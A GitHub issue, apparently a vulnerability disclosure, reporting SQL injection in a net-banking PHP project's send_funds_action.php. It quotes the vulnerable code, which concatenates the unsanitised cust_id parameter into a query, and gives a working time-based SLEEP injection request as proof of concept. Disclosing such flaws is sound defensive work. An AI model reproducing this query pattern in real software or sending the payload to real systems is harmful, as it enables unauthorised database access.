-
Notifications
You must be signed in to change notification settings - Fork 91
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Found a vulnerability #19
Comments
Please can I have your Facebook contact or WhatsApp or Skype?
…On Mon, Sep 5, 2022, 10:18 0clickjacking0 ***@***.***> wrote:
Vulnerability file address
net-banking/send_funds_action.php from line 17,The $_GET['cust_id']
parameter is controllable, the parameter cust_id can be passed through get,
and the $receiver_id is not protected from sql injection, line 29 $result5
= $conn->query($sql5); made a sql query,resulting in sql injection
..................
if (isset($_GET['cust_id'])) {
$receiver_id = $_GET['cust_id'];
}
$sender_id = $_SESSION['loggedIn_cust_id'];
$amt = mysqli_real_escape_string($conn, $_POST["amt"]);
$password = mysqli_real_escape_string($conn, $_POST["password"]);
$sql0 = "SELECT * FROM customer WHERE cust_id=".$sender_id." AND pwd='".$password."'";
$result0 = $conn->query($sql0);
$row0 = $result0->fetch_assoc();
$sql5 = "SELECT * FROM customer WHERE cust_id=".$receiver_id;
$result5 = $conn->query($sql5);..................
POC
GET /net-banking/send_funds_action.php?cust_id=666 AND (SELECT 2011 FROM (SELECT(SLEEP(5)))DwUi) HTTP/1.1Host: www.bank.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=m5fjmb3r9rvk4i56cqc22ht3c3Upgrade-Insecure-Requests: 1
Attack results pictures
[image: image-20220904201949905]
<https://camo.githubusercontent.com/e87e2b01b26d7f5a6f9aad101ade934b4c59f2219d0f57eeade12f5237070cea/68747470733a2f2f7869616e7975313233696d616765732e6f73732d636e2d68616e677a686f752e616c6979756e63732e636f6d2f32303232303930343230313934392e706e67>
—
Reply to this email directly, view it on GitHub
<#19>, or
unsubscribe
<https://github.com/notifications/unsubscribe-auth/ALVAVO3275W5YFBJESLFPXLV4XCHDANCNFSM6AAAAAAQE3A3I4>
.
You are receiving this because you are subscribed to this thread.Message
ID: ***@***.***>
|
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Vulnerability file address
net-banking/send_funds_action.php
from line 17,The$_GET['cust_id']
parameter is controllable, the parameter cust_id can be passed through get, and the$receiver_id
is not protected from sql injection, line 29$result5 = $conn->query($sql5);
made a sql query,resulting in sql injectionPOC
Attack results pictures
The text was updated successfully, but these errors were encountered: